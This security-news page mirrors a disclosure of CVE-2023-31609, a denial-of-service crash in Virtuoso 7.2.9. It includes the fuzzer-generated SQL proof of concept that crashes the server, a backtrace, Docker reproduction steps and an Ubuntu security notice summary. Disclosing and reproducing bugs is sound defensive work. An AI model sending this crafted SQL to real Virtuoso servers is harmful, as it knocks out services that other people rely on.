Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-31609: virtuoso 7.2.9 crashed at dfe_unit_col_loci · Issue #1126 · openlink/virtuoso-opensource

An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

CVE
#sql#dos#docker

The PoC is generated by my DBMS fuzzer.

CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f VARCHAR(80) ); SELECT case b.d when coalesce((select max(17+coalesce((select max(coalesce((select (select count(distinct case f when 19 then coalesce((select coalesce((select max(11-(abs(d)/abs(11))) from b where not -c in (19,b.d,17)),17) from b where (f in (d,f,b.c))),d) else d end) from b) from b where 17 between e and b.f),b.c)) from b where 13>=e),d)) from b where b.f>b.f),b.d) then 17 else b.f end FROM b WHERE not exists(select 1 from b where 13 between c+17 and (b.id));

backtrace:

#0 0x739343 (dfe_unit_col_loci+0x1393) #1 0x739030 (dfe_unit_col_loci+0x1080) #2 0x747e8c (sqlg_top_1+0x7c) #3 0x70d4d4 (sqlo_top_select+0x164) #4 0x6b72bf (sql_stmt_comp+0x8bf) #5 0x6ba122 (sql_compile_1+0x1a62) #6 0x7c8cd0 (stmt_set_query+0x340) #7 0x7cabc2 (sf_sql_execute+0x922) #8 0x7cbf4e (sf_sql_execute_w+0x17e) #9 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #10 0xe1f01c (future_wrapper+0x3fc) #11 0xe2691e (_thread_boot+0x11e) #12 0x7fb2a20b9609 (start_thread+0xd9) #13 0x7fb2a1e89133 (clone+0x43)

ways to reproduce (write poc to the file ‘/tmp/test.sql’ first):

remove the old one

docker container rm virtdb_test -f

start virtuoso through docker

docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9

wait the server starting

sleep 10

check whether the simple query works

echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba

run the poc

docker exec -i virtdb_test isql 1111 dba < “/tmp/test.sql”

Related news

Ubuntu Security Notice USN-6832-1

Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907